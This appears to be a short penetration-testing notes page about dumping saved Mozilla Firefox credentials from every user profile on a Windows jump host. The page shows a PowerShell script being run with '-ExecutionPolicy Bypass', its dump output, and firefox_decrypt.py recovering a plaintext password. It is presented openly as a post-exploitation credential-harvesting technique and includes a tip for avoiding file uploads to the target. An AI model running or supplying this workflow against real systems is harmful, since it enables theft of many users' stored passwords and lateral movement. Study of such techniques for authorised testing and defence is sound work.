Windows - Mozilla Firefox

When trying to gather additional credentials from lets say an Administrator Jump Host, extracting sensitive Mozilla Firefox files is a great approach. Doing this manually is boring and time consuming, especially if there are hundreds of users under C:\Users.

To simplify this I've made a simple PowerShell script, firefox_dump.ps1, that gathers all sensitive Mozilla Firefox information which can later be decrypted using firefox_decrypt.py or similar.

The script should be ran as a high privileged user to gather as much information as possible.

Example Usage

PS E:\devop-scripts> powershell.exe -ExecutionPolicy Bypass .\firefox_dump.ps1
[-] 'Public' doesn't have any saved passwords in Mozilla Firefox
[+] Dumping secrets from 'user' to: C:\Users\void\AppData\Local\Temp\user\firefox\ahf32hh2.default-release
[+] Dumping secrets from 'user2' to: C:\Users\void\AppData\Local\Temp\user2\firefox\plhh3lmm.default-release
[-] 'user3' doesn't have any saved passwords in Mozilla Firefox
[+] Dumping secrets from 'void' to: C:\Users\void\AppData\Local\Temp\void\firefox\plmxz1zm.default-release

If you don't want to upload files to the target host it's possible to simply copy-paste the try-catch code from the script and run it as is in PowerShell.

┌──(void㉿void)-[/opt/firefox_decrypt]
└─$ ./firefox_decrypt.py /tmp/firefox-loot/user1            

Website:   http://localhost:8000
Username: 'dev-user'
Password: 'D3velopm3ntM@st3rK3y*!'

GitHub - 0xPThree/Windows-HarvestingGitHub

GitHub - unode/firefox_decrypt: Firefox Decrypt is a tool to extract passwords from Mozilla (Firefox™, Waterfox™, Thunderbird®, SeaMonkey®) profilesGitHub

Last updated 10 months ago

Was this helpful?